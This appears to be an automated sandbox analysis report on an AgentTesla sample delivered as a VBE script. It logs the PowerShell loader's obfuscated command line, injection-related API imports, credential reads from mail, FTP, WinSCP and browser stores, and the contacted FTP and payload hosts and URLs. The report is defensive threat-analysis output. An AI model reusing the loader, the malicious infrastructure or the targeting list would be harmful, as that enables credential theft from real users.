poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_010E4A7A bind, 17_2_010E4A7A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 17_2_010E4A55 bind, 17_2_010E4A55
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 755441 Sample: PO-08784 xlsx.vbe Startdate: 28/11/2022 Architecture: WINDOWS Score: 100 35 ftp.mcmprint.net 2->35 37 b3solutionscws.com 2->37 39 2 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 63 Wscript starts Powershell (via cmd or directly) 9->63 65 Obfuscated command line found 9->65 67 Very long command line found 9->67 12 powershell.exe 25 9->12         started        16 cmd.exe 1 9->16         started        process6 file7 33 C:\Users\user\AppData\...\3uneeqsg.cmdline, Unicode 12->33 dropped 69 Tries to detect Any.run 12->69 71 Hides threads from debuggers 12->71 18 CasPol.exe 15 12 12->18         started        22 csc.exe 3 12->22         started        25 conhost.exe 12->25         started        27 conhost.exe 16->27         started        signatures8 process9 dnsIp10 41 ftp.mcmprint.net 185.31.121.136, 21, 49807, 49808 RAX-ASBG Bulgaria 18->41 43 b3solutionscws.com 192.185.145.188, 49803, 80 UNIFIEDLAYER-AS-1US United States 18->43 45 api.ipify.org.herokudns.com 54.91.59.199, 443, 49805 AMAZON-AESUS United States 18->45 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->55 57 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->57 59 Tries to steal Mail credentials (via file / registry access) 18->59 61 5 other signatures 18->61 31 C:\Users\user\AppData\Local\...\3uneeqsg.dll, PE32 22->31 dropped 29 cvtres.exe 1 22->29         started        file11 signatures12 process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
54.91.59.199
 api.ipify.org.herokudns.com United States
14618 AMAZON-AESUS false
192.185.145.188
 b3solutionscws.com United States
46606 UNIFIEDLAYER-AS-1US false
185.31.121.136
 ftp.mcmprint.net Bulgaria
199364 RAX-ASBG true

Contacted Domains

Name IP Active
api.ipify.org.herokudns.com 54.91.59.199 true
ftp.mcmprint.net 185.31.121.136 true
b3solutionscws.com 192.185.145.188 true
api.ipify.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.ipify.org/ false
    		high
    http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb false
    • Avira URL Cloud: safe
    		 unknown